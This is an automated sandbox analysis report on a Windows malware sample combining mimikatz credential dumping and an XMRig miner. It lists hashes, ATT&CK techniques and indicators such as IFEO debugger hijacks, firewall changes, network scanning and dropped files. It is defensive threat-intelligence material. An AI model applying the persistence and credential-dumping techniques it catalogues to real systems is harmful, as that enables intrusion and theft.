mimikatz | 948859978b60564c7999fa83b7ac9a8c0fd9b9f5640f46bf0c328ece29c3ec57

Analysis

max time kernel
150s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
30-12-2024 23:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-12-30_97fd023828474558fe6554d8cad2d60a_hacktools_icedid_mimikatz.exe
Size

10.3MB
MD5

97fd023828474558fe6554d8cad2d60a
SHA1

843952d7e46650e272a66bccbabd53e58d44dc43
SHA256

948859978b60564c7999fa83b7ac9a8c0fd9b9f5640f46bf0c328ece29c3ec57
SHA512

054330eea430b098cef032086ce8fd201c27bf285bf7e0c79b10d70d9adcb62487ad715dcd9e4d1d5c94406d9c448668210950d511c02961f450ee15df2e4056
SSDEEP

196608:7po1mknGzwHdOgEPHd9BbX/nivPlTXTYe:agjz0E57/iv1

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4396 created 2116	4396	ibebikp.exe	38

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (30222) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral2/memory/1840-178-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	xmrig
behavioral2/memory/1840-182-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	xmrig
behavioral2/memory/1840-199-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	xmrig
behavioral2/memory/1840-212-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	xmrig
behavioral2/memory/1840-218-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	xmrig
behavioral2/memory/1840-232-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	xmrig
behavioral2/memory/1840-249-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	xmrig
behavioral2/memory/1840-498-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	xmrig
behavioral2/memory/1840-499-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	xmrig
behavioral2/memory/1840-501-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	xmrig
behavioral2/memory/1840-756-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	xmrig
behavioral2/memory/1840-758-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

resource	yara_rule
behavioral2/memory/4568-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/4568-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x0007000000023ca6-6.dat	mimikatz
behavioral2/memory/2912-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/4556-138-0x00007FF6F45B0000-0x00007FF6F469E000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	ibebikp.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	ibebikp.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ibebikp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	ibebikp.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1932	netsh.exe
3680	netsh.exe

Executes dropped EXE 29 IoCs

pid	Process
2912	ibebikp.exe
4396	ibebikp.exe
3208	wpcap.exe
4480	tpviuibgv.exe
4556	vfshost.exe
2388	vmgumyclb.exe
4984	xohudmc.exe
3300	cuwoqc.exe
1840	ttittb.exe
4064	vmgumyclb.exe
2680	vmgumyclb.exe
1948	vmgumyclb.exe
1796	vmgumyclb.exe
2000	vmgumyclb.exe
1660	vmgumyclb.exe
4816	vmgumyclb.exe
2508	vmgumyclb.exe
3388	vmgumyclb.exe
4472	vmgumyclb.exe
4564	vmgumyclb.exe
5104	vmgumyclb.exe
1436	vmgumyclb.exe
3384	vmgumyclb.exe
4620	vmgumyclb.exe
3344	ibebikp.exe
3404	vmgumyclb.exe
996	vmgumyclb.exe
4708	lubvuzbtm.exe
1052	ibebikp.exe

Loads dropped DLL 12 IoCs

pid	Process
3208	wpcap.exe
3208	wpcap.exe
3208	wpcap.exe
3208	wpcap.exe
3208	wpcap.exe
3208	wpcap.exe
3208	wpcap.exe
3208	wpcap.exe
3208	wpcap.exe
4480	tpviuibgv.exe
4480	tpviuibgv.exe
4480	tpviuibgv.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
64	ifconfig.me
65	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	ibebikp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F	ibebikp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	ibebikp.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File created	C:\Windows\SysWOW64\cuwoqc.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\cuwoqc.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	ibebikp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	ibebikp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	ibebikp.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F	ibebikp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	ibebikp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	ibebikp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	ibebikp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	ibebikp.exe

UPX packed file 37 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cf9-134.dat	upx
behavioral2/memory/4556-136-0x00007FF6F45B0000-0x00007FF6F469E000-memory.dmp	upx
behavioral2/memory/4556-138-0x00007FF6F45B0000-0x00007FF6F469E000-memory.dmp	upx
behavioral2/files/0x0007000000023d04-141.dat	upx
behavioral2/memory/2388-142-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp	upx
behavioral2/memory/2388-160-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp	upx
behavioral2/files/0x0007000000023d01-164.dat	upx
behavioral2/memory/1840-165-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	upx
behavioral2/memory/4064-171-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp	upx
behavioral2/memory/2680-175-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp	upx
behavioral2/memory/1840-178-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	upx
behavioral2/memory/1948-180-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp	upx
behavioral2/memory/1840-182-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	upx
behavioral2/memory/1796-185-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp	upx
behavioral2/memory/2000-189-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp	upx
behavioral2/memory/1660-193-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp	upx
behavioral2/memory/4816-197-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp	upx
behavioral2/memory/1840-199-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	upx
behavioral2/memory/2508-202-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp	upx
behavioral2/memory/3388-206-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp	upx
behavioral2/memory/4472-210-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp	upx
behavioral2/memory/1840-212-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	upx
behavioral2/memory/4564-215-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp	upx
behavioral2/memory/1840-218-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	upx
behavioral2/memory/5104-220-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp	upx
behavioral2/memory/1436-224-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp	upx
behavioral2/memory/3384-228-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp	upx
behavioral2/memory/4620-231-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp	upx
behavioral2/memory/1840-232-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	upx
behavioral2/memory/3404-236-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp	upx
behavioral2/memory/996-238-0x00007FF7B39D0000-0x00007FF7B3A2B000-memory.dmp	upx
behavioral2/memory/1840-249-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	upx
behavioral2/memory/1840-498-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	upx
behavioral2/memory/1840-499-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	upx
behavioral2/memory/1840-501-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	upx
behavioral2/memory/1840-756-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	upx
behavioral2/memory/1840-758-0x00007FF69FC90000-0x00007FF69FDB0000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\buzcwvvny\UnattendGC\specials\libxml2.dll	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\svschost.xml	ibebikp.exe
File opened for modification	C:\Windows\tmbllbvl\vimpcsvc.xml	ibebikp.exe
File created	C:\Windows\buzcwvvny\Corporate\vfshost.exe	ibebikp.exe
File created	C:\Windows\tmbllbvl\docmicfg.xml	ibebikp.exe
File created	C:\Windows\buzcwvvny\upbdrjv\swrpwe.exe	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\spoolsrv.xml	ibebikp.exe
File created	C:\Windows\buzcwvvny\Corporate\mimilib.dll	ibebikp.exe
File created	C:\Windows\buzcwvvny\mmzbiruiz\lubvuzbtm.exe	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\zlib1.dll	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\schoedcl.xml	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\coli-0.dll	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\spoolsrv.exe	ibebikp.exe
File created	C:\Windows\tmbllbvl\svschost.xml	ibebikp.exe
File created	C:\Windows\tmbllbvl\spoolsrv.xml	ibebikp.exe
File created	C:\Windows\tmbllbvl\ibebikp.exe	2024-12-30_97fd023828474558fe6554d8cad2d60a_hacktools_icedid_mimikatz.exe
File opened for modification	C:\Windows\tmbllbvl\ibebikp.exe	2024-12-30_97fd023828474558fe6554d8cad2d60a_hacktools_icedid_mimikatz.exe
File created	C:\Windows\buzcwvvny\mmzbiruiz\Packet.dll	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\exma-1.dll	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\trch-1.dll	ibebikp.exe
File opened for modification	C:\Windows\tmbllbvl\docmicfg.xml	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\libeay32.dll	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\svschost.exe	ibebikp.exe
File created	C:\Windows\buzcwvvny\mmzbiruiz\tpviuibgv.exe	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\cnli-1.dll	ibebikp.exe
File opened for modification	C:\Windows\tmbllbvl\spoolsrv.xml	ibebikp.exe
File created	C:\Windows\ime\ibebikp.exe	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\trfo-2.dll	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\vimpcsvc.exe	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\schoedcl.xml	ibebikp.exe
File created	C:\Windows\tmbllbvl\schoedcl.xml	ibebikp.exe
File opened for modification	C:\Windows\tmbllbvl\schoedcl.xml	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\AppCapture32.dll	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\posh-0.dll	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\tibe-2.dll	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\AppCapture64.dll	ibebikp.exe
File created	C:\Windows\buzcwvvny\mmzbiruiz\wpcap.exe	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\tucl-1.dll	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\schoedcl.exe	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\vimpcsvc.xml	ibebikp.exe
File created	C:\Windows\tmbllbvl\vimpcsvc.xml	ibebikp.exe
File opened for modification	C:\Windows\tmbllbvl\svschost.xml	ibebikp.exe
File created	C:\Windows\buzcwvvny\mmzbiruiz\wpcap.dll	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\ssleay32.dll	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\docmicfg.exe	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\spoolsrv.xml	ibebikp.exe
File opened for modification	C:\Windows\buzcwvvny\Corporate\log.txt	cmd.exe
File opened for modification	C:\Windows\buzcwvvny\mmzbiruiz\Result.txt	lubvuzbtm.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\xdvl-0.dll	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\vimpcsvc.xml	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\ucl.dll	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\docmicfg.xml	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\Shellcode.ini	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\crli-0.dll	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\svschost.xml	ibebikp.exe
File created	C:\Windows\buzcwvvny\Corporate\mimidrv.sys	ibebikp.exe
File created	C:\Windows\buzcwvvny\mmzbiruiz\ip.txt	ibebikp.exe
File created	C:\Windows\buzcwvvny\mmzbiruiz\scan.bat	ibebikp.exe
File opened for modification	C:\Windows\buzcwvvny\mmzbiruiz\Packet.dll	ibebikp.exe
File created	C:\Windows\buzcwvvny\UnattendGC\specials\docmicfg.xml	ibebikp.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3984	sc.exe
3944	sc.exe
1700	sc.exe
2872	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
